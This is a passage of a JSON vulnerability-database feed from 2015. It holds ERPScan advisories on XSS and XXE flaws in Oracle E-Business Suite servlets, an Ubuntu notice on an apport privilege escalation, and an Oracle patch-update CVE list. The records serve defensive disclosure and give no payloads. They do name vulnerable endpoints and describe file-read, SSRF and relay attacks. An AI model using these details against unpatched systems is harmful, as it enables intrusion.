DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due\r\nto lack of sanitizing the "domain" parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
